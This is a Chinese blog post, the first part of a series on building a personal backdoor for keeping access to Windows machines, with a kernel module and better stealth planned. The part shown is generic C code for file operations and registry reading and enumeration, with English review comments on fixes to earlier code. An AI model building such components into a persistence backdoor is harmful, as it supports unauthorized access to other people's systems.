• 个人的后门程序开发(第一部分):文件操作和注册表管理


    本来是想寒假时写的,结果一直懒得动手。

    虽然手上有ghost源码,但是感觉功能不是我想要的,比如把精力费在学MFC写界面上不如改进下隐藏性。

    基本的计划就是做一个后门程序,目的是用来进行权限维持的。目前来看是基于控制台的,而且要带有内核模块。应用层的主要问题就是没写过太大体量的程序,搞起来很蛋疼;内核方面就是通用性坑爹,蓝屏起来也要费时间。

    第一部分就是封装的两个函数,文件操作和注册表管理。ghost是把这两个功能封装成两个类,我这里就直接用函数来实现了。

    VS2015编译通过

      1 //文件操作类函数
      2 #include "windows.h"
      3 
      //Mode: operation selector for FileControl()
      //0.create file 1.delete file 2.write file 3.read file 4.move file 5.query file info
      #define CREATE_FILE 0
      #define DELETE_FILE 1
      #define WRITE_FILE  2
      #define READ_FILE   3
      #define MOVE_FILE   4
      #define QUERY_FILE  5

      // Status values FileControl() returns when it has no Win32 error code to
      // report.  Win32 error codes travel in the same DWORD, and
      // ERROR_INVALID_FUNCTION is 1, so a caller cannot always tell them apart.
      #define FILE_SUCCESS 1
      #define FILE_ERROR   0
     15 
     // File information handed back by FileControl(QUERY_FILE): the function
     // stores a pointer to a HeapAlloc'd FILE_INFO in the caller's Buffer.
     // FileName and TypeName are separate HeapAlloc'd copies of the SHFILEINFO
     // szDisplayName / szTypeName arrays, copied byte-for-byte, so in a UNICODE
     // build (which the LPWSTR FilePath implies) they hold wide characters
     // despite the char* type.  Nothing in this file frees the three blocks;
     // the caller has to release them with HeapFree on the process heap.
     typedef struct _FileInfo{
         DWORD FileAttributes;   // SHFILEINFO.dwAttributes
         char *FileName;         // copy of SHFILEINFO.szDisplayName
         char *TypeName;         // copy of SHFILEINFO.szTypeName

     } FILE_INFO,*PFILE_INFO;
     23 
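     /* Open FilePath with exactly the access a FileControl() mode needs.
      * Returns INVALID_HANDLE_VALUE on failure; GetLastError() is then the
      * CreateFileW error. */
     static HANDLE FileControlOpen(LPCWSTR FilePath, DWORD DesiredAccess, DWORD CreationDisposition)
     {
         return CreateFileW(FilePath,
             DesiredAccess,
             FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE,
             NULL,
             CreationDisposition,
             FILE_ATTRIBUTE_NORMAL,
             NULL);
     }

     /* Position FileHandle at the absolute byte Offset.  The old code passed
      * the high 32 bits as lDistanceToMove and the low 32 bits through
      * lpDistanceToMoveHigh (swapped); SetFilePointerEx takes the whole 64-bit
      * offset and reports failure unambiguously.  Returns FALSE on failure
      * with GetLastError() set. */
     static BOOL FileControlSeek(HANDLE FileHandle, __int64 Offset)
     {
         LARGE_INTEGER Distance;
         Distance.QuadPart = Offset;
         return SetFilePointerEx(FileHandle, Distance, NULL, FILE_BEGIN);
     }

     /* Build a heap-allocated FILE_INFO for FilePath from SHGetFileInfoW.
      * Returns NULL when the shell query or an allocation fails, leaking
      * nothing.  FileName/TypeName receive the raw bytes of the SHFILEINFOW
      * arrays, i.e. wide characters, despite their char* type. */
     static PFILE_INFO FileControlQuery(LPCWSTR FilePath)
     {
         SHFILEINFOW ShellInfo = { 0 };
         HANDLE Heap = GetProcessHeap();
         PFILE_INFO Info = NULL;

         /* the old code ignored this return and copied a zeroed struct */
         if (!SHGetFileInfoW(FilePath, 0, &ShellInfo, sizeof ShellInfo,
                 SHGFI_TYPENAME | SHGFI_DISPLAYNAME | SHGFI_ATTRIBUTES)) {
             return NULL;
         }
         /* HEAP_ZERO_MEMORY already zeroes the block; no memset needed */
         Info = (PFILE_INFO)HeapAlloc(Heap, HEAP_ZERO_MEMORY, sizeof *Info);
         if (Info == NULL) {
             return NULL;
         }
         Info->FileAttributes = ShellInfo.dwAttributes;
         Info->FileName = (char *)HeapAlloc(Heap, HEAP_ZERO_MEMORY, sizeof ShellInfo.szDisplayName);
         Info->TypeName = (char *)HeapAlloc(Heap, HEAP_ZERO_MEMORY, sizeof ShellInfo.szTypeName);
         if (Info->FileName == NULL || Info->TypeName == NULL) {
             /* the old code memcpy'd into these without checking them */
             if (Info->FileName != NULL) {
                 HeapFree(Heap, 0, Info->FileName);
             }
             if (Info->TypeName != NULL) {
                 HeapFree(Heap, 0, Info->TypeName);
             }
             HeapFree(Heap, 0, Info);
             return NULL;
         }
         memcpy(Info->FileName, ShellInfo.szDisplayName, sizeof ShellInfo.szDisplayName);
         memcpy(Info->TypeName, ShellInfo.szTypeName, sizeof ShellInfo.szTypeName);
         return Info;
     }

     /*
      * FileControl - one entry point for the file operations selected by Mode.
      *
      * Mode         CREATE_FILE, DELETE_FILE, WRITE_FILE, READ_FILE, MOVE_FILE
      *              or QUERY_FILE; anything else is rejected with FILE_ERROR.
      * FilePath     path of the file to operate on (must not be NULL).
      * Buffer       meaning depends on Mode:
      *                READ_FILE  - destination for the data, at least *Size bytes
      *                WRITE_FILE - source of the data, *Size bytes
      *                MOVE_FILE  - LPCWSTR holding the destination path
      *                QUERY_FILE - a PFILE_INFO slot that receives the
      *                             HeapAlloc'd FILE_INFO (the caller frees it and
      *                             its two strings with HeapFree on the process
      *                             heap); a full pointer is stored, so 64-bit
      *                             callers must read it as a pointer, not a DWORD
      *              unused for CREATE_FILE and DELETE_FILE.
      * FilePointer  absolute byte offset for READ_FILE / WRITE_FILE (0 is valid);
      *              ignored by the other modes.
      * Size         in: bytes to transfer, out: bytes actually transferred.
      *              Required for READ_FILE and WRITE_FILE.
      *
      * Returns FILE_SUCCESS on success, FILE_ERROR for a bad argument or a
      * failure without a Win32 error code (MOVE_FILE, QUERY_FILE), otherwise
      * the GetLastError() value of the failing call.  Those codes share the
      * return channel with FILE_SUCCESS/FILE_ERROR (ERROR_INVALID_FUNCTION is
      * 1), so callers that need the distinction should be given a separate
      * error out-parameter.  The handle is closed on every path.
      */
     DWORD FileControl(IN DWORD Mode, IN LPWSTR FilePath, IN OUT PVOID Buffer, IN __int64 FilePointer, IN OUT DWORD *Size)
     {
         HANDLE FileHandle = INVALID_HANDLE_VALUE;
         DWORD DesiredAccess = 0;
         DWORD CreationDisposition = 0;
         BOOL NeedsHandle = TRUE;
         DWORD Return = FILE_SUCCESS;

         if (FilePath == NULL) {
             return FILE_ERROR;
         }

         /* Request only the access each mode needs.  The old code OR'ed
          * GENERIC_ALL into every open, so a read failed on any file the
          * caller could read but not fully control. */
         switch (Mode) {
         case CREATE_FILE:
             DesiredAccess = GENERIC_READ | GENERIC_WRITE;
             CreationDisposition = CREATE_NEW;
             break;
         case READ_FILE:
             DesiredAccess = GENERIC_READ;
             CreationDisposition = OPEN_EXISTING;
             break;
         case WRITE_FILE:
             DesiredAccess = GENERIC_WRITE;
             CreationDisposition = OPEN_EXISTING;
             break;
         case QUERY_FILE:
             /* zero access still confirms the file exists (same error code
              * as before when it does not) without needing any right on it */
             DesiredAccess = 0;
             CreationDisposition = OPEN_EXISTING;
             break;
         case DELETE_FILE:
         case MOVE_FILE:
             NeedsHandle = FALSE;   /* path-based APIs, no handle involved */
             break;
         default:
             return FILE_ERROR;     /* unknown Mode: reject before touching the file */
         }

         if (NeedsHandle) {
             FileHandle = FileControlOpen(FilePath, DesiredAccess, CreationDisposition);
             if (FileHandle == INVALID_HANDLE_VALUE) {
                 return GetLastError();
             }
         }

         switch (Mode) {
         case CREATE_FILE:
             /* the file exists now; closing the handle below is the whole job */
             break;
         case DELETE_FILE:
             if (!DeleteFileW(FilePath)) {
                 Return = GetLastError();
             }
             break;
         case MOVE_FILE:
             /* Buffer carries the destination path */
             if (Buffer == NULL || !MoveFileW(FilePath, (LPCWSTR)Buffer)) {
                 Return = FILE_ERROR;
             }
             break;
         case QUERY_FILE:
             if (Buffer == NULL) {
                 Return = FILE_ERROR;
                 break;
             }
             {
                 PFILE_INFO Info = FileControlQuery(FilePath);
                 if (Info == NULL) {
                     Return = FILE_ERROR;
                     break;
                 }
                 /* store a full pointer; the old (DWORD) cast truncated it on x64 */
                 *(PFILE_INFO *)Buffer = Info;
             }
             break;
         case READ_FILE:
             /* offset 0 is valid; the old `!FilePointer` test rejected it */
             if (Buffer == NULL || Size == NULL) {
                 Return = FILE_ERROR;
                 break;
             }
             if (!FileControlSeek(FileHandle, FilePointer)) {
                 Return = GetLastError();
                 break;
             }
             memset(Buffer, 0, *Size);
             if (!ReadFile(FileHandle, Buffer, *Size, Size, NULL)) {
                 Return = GetLastError();
             }
             break;
         case WRITE_FILE:
             if (Buffer == NULL || Size == NULL) {
                 Return = FILE_ERROR;
                 break;
             }
             if (!FileControlSeek(FileHandle, FilePointer)) {
                 Return = GetLastError();
                 break;
             }
             /* the old case had no `break` and fell into `default`, so even a
              * successful write reported FILE_ERROR and leaked the handle */
             if (!WriteFile(FileHandle, Buffer, *Size, Size, NULL)) {
                 Return = GetLastError();
             }
             break;
         default:
             Return = FILE_ERROR;
             break;
         }

         /* single exit: the old early returns leaked the handle on every error */
         if (FileHandle != INVALID_HANDLE_VALUE) {
             CloseHandle(FileHandle);
         }
         return Return;
     }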
    /* IfFile - collapse a FileControl() return value to 1 for FILE_SUCCESS,
     * 0 for FILE_ERROR and (DWORD)-1 (0xFFFFFFFF) for anything else, which in
     * practice is a Win32 error code.  Note that it cannot distinguish a
     * Win32 error code that happens to equal 0 or 1 from the status values. */
    DWORD IfFile(DWORD Return)
    {
        if (Return == FILE_SUCCESS) {
            return 1;
        }
        if (Return == FILE_ERROR) {
            return 0;
        }
        return (DWORD)-1;
    }
      1 //注册表操作的封装函数
      #include "windows.h"
      #include <stdio.h>
      #include <string.h>
      3 
      // ReadReg() Mode values (the names are pinyin for the Chinese comment below)
      #define DUQV 0             // read the data of one value
      #define MEIJVZIJIAN 1      // enumerate the subkeys
      #define MEIJVJIANXIANG 2   // enumerate the values of the key
      #define PANDUANCUNZAI 3    // test whether the key exists
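      /* Helpers for ReadReg().  The enumeration helpers use the ANSI (A)
       * registry functions because the listing lands in a char* buffer; the
       * old code mixed narrow buffers with wide wsprintf/lstrcat calls and
       * passed a byte count where RegEnumValue expects a character count. */

      /* Append one NUL-terminated Line to szData, tracking the current length
       * in *Used instead of rescanning with strcat.  NOTE(review): ReadReg's
       * signature carries no capacity for szData, so this append cannot be
       * bounded; callers must size szData for the key they list, and a
       * capacity parameter is the proper fix. */
      static void ReadRegAppend(char *szData, size_t *Used, const char *Line)
      {
          size_t Len = strlen(Line);
          memcpy(szData + *Used, Line, Len + 1);
          *Used += Len;
      }

      /* DUQV: query Vname's data into szBytes (lbSize bytes).  Returns 1 on
       * success, -1 when the value cannot be read (including ERROR_MORE_DATA
       * when lbSize is too small), 0 when Type is not a supported kind.  With
       * szBytes == NULL the call only checks that the value is readable. */
      static int ReadRegQueryValue(HKEY hKey, LPCTSTR Vname, DWORD Type, LPBYTE szBytes, DWORD lbSize)
      {
          DWORD ActualType = 0;
          DWORD DataSize = (szBytes != NULL) ? lbSize : 0;

          switch (Type) {
          case REG_SZ:
          case REG_EXPAND_SZ:
          case REG_MULTI_SZ:
          case REG_BINARY:
              break;
          default:
              return 0;
          }
          /* The old code compared against ERROR_SUCCESS with the sense
           * inverted, so a readable value reported -1, and it passed &Type,
           * clobbering the caller's argument.  String data went into a local
           * buffer and was discarded; it now lands in the caller's szBytes,
           * in the registry's stored form (not necessarily NUL-terminated). */
          if (RegQueryValueEx(hKey, Vname, NULL, &ActualType, szBytes, &DataSize) != ERROR_SUCCESS) {
              return -1;
          }
          return 1;
      }

      /* MEIJVZIJIAN: append "[name]\n" to szData for every subkey.  Returns 1
       * when at least one subkey was listed, 0 otherwise. */
      static int ReadRegEnumSubKeys(HKEY hKey, char *szData)
      {
          char Name[256];                /* registry key names are limited to 255 characters */
          char Line[sizeof Name + 4];    /* "[" + name + "]\n" + NUL */
          DWORD Index = 0;
          size_t Used;
          int Found = 0;

          if (szData == NULL) {
              return 0;
          }
          Used = strlen(szData);
          for (;;) {
              DWORD NameLen = sizeof Name;   /* characters, including the NUL */
              if (RegEnumKeyExA(hKey, Index++, Name, &NameLen, NULL, NULL, NULL, NULL) != ERROR_SUCCESS) {
                  break;
              }
              snprintf(Line, sizeof Line, "[%s]\n", Name);
              ReadRegAppend(szData, &Used, Line);
              Found = 1;   /* the old code set -1 here, unlike the value enumerator */
          }
          return Found;
      }

      /* MEIJVJIANXIANG: append one formatted line per value to szData.
       * Entries whose name or data do not fit the local buffers are skipped
       * instead of ending the enumeration.  Returns 1 when at least one value
       * was listed, 0 otherwise. */
      static int ReadRegEnumValues(HKEY hKey, char *szData)
      {
          char Name[256];
          BYTE Data[1024 + 1];           /* +1 so string data can always be terminated */
          char Line[sizeof Name + sizeof Data + 48];
          DWORD Index = 0;
          size_t Used;
          int Found = 0;

          if (szData == NULL) {
              return 0;
          }
          Used = strlen(szData);
          for (;;) {
              DWORD NameLen = sizeof Name;       /* characters */
              DWORD DataLen = sizeof Data - 1;   /* bytes */
              DWORD ValueType = REG_NONE;
              DWORD Dword = 0;
              LONG rc = RegEnumValueA(hKey, Index++, Name, &NameLen, NULL, &ValueType, Data, &DataLen);

              if (rc == ERROR_MORE_DATA) {
                  continue;   /* too big for the local buffers; the old code stopped here */
              }
              if (rc != ERROR_SUCCESS) {
                  break;
              }
              Data[DataLen] = 0;   /* REG_SZ data is not guaranteed to be NUL-terminated */
              switch (ValueType) {
              case REG_SZ:
                  snprintf(Line, sizeof Line, "%-24s %-15s %s \n", Name, "REG_SZ", (char *)Data);
                  break;
              case REG_EXPAND_SZ:
                  snprintf(Line, sizeof Line, "%-24s %-15s %s \n", Name, "REG_EXPAND_SZ", (char *)Data);
                  break;
              case REG_DWORD:
                  /* the old code printed the buffer's address instead of the value */
                  if (DataLen >= sizeof Dword) {
                      memcpy(&Dword, Data, sizeof Dword);
                  }
                  snprintf(Line, sizeof Line, "%-24s %-15s 0x%lx(%lu) \n", Name, "REG_DWORD",
                      (unsigned long)Dword, (unsigned long)Dword);
                  break;
              case REG_MULTI_SZ:
                  snprintf(Line, sizeof Line, "%-24s %-15s \n", Name, "REG_MULTI_SZ");
                  break;
              case REG_BINARY:
                  snprintf(Line, sizeof Line, "%-24s %-15s \n", Name, "REG_BINARY");
                  break;
              default:
                  /* other types were listed as an empty line before */
                  snprintf(Line, sizeof Line, "%-24s type=%lu \n", Name, (unsigned long)ValueType);
                  break;
              }
              ReadRegAppend(szData, &Used, Line);
              Found = 1;
          }
          return Found;
      }

      /*
       * ReadReg - read, enumerate or probe a registry key, selected by Mode.
       *
       * MainKey  root or already-open key under which SubKey lives.  It is not
       *          closed here: closing a predefined HKEY_* is a no-op, but the
       *          old RegCloseKey(MainKey) would invalidate a handle the caller
       *          opened and still holds.
       * SubKey   key path relative to MainKey.
       * Vname    value name (DUQV only).
       * Type     expected value type for DUQV: REG_SZ, REG_EXPAND_SZ,
       *          REG_MULTI_SZ or REG_BINARY; ignored by the other modes.
       * szData   text output for MEIJVZIJIAN / MEIJVJIANXIANG: one line per
       *          entry is appended to the NUL-terminated string already in it.
       *          No capacity is passed, so the caller must size it for the key.
       * szBytes  output buffer for DUQV, lbSize bytes; receives the raw value
       *          data as stored (strings in the registry's own encoding).
       * lbSize   capacity of szBytes in bytes.
       * Mode     DUQV, MEIJVZIJIAN, MEIJVJIANXIANG or PANDUANCUNZAI.
       *
       * Returns 1 on success, 0 when nothing was done (unsupported Type or
       * Mode, or an enumeration that listed nothing), -1 when the key cannot be
       * opened or the value cannot be read.  hKey is closed on every path.
       */
      int ReadReg(HKEY MainKey, LPCTSTR SubKey, LPCTSTR Vname, DWORD Type, char *szData, LPBYTE szBytes, DWORD lbSize, int Mode)
      {
          HKEY hKey = NULL;
          int iResult = 0;

          if (RegOpenKeyEx(MainKey, SubKey, 0, KEY_READ, &hKey) != ERROR_SUCCESS) {
              return -1;
          }

          switch (Mode) {
          case DUQV:
              iResult = ReadRegQueryValue(hKey, Vname, Type, szBytes, lbSize);
              break;
          case MEIJVZIJIAN:
              iResult = ReadRegEnumSubKeys(hKey, szData);
              break;
          case MEIJVJIANXIANG:
              iResult = ReadRegEnumValues(hKey, szData);
              break;
          case PANDUANCUNZAI:
              iResult = 1;   /* RegOpenKeyEx succeeding is the whole test */
              break;
          default:
              break;
          }

          RegCloseKey(hKey);
          return iResult;
      }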
  • 原文地址:https://www.cnblogs.com/Ox9A82/p/5245743.html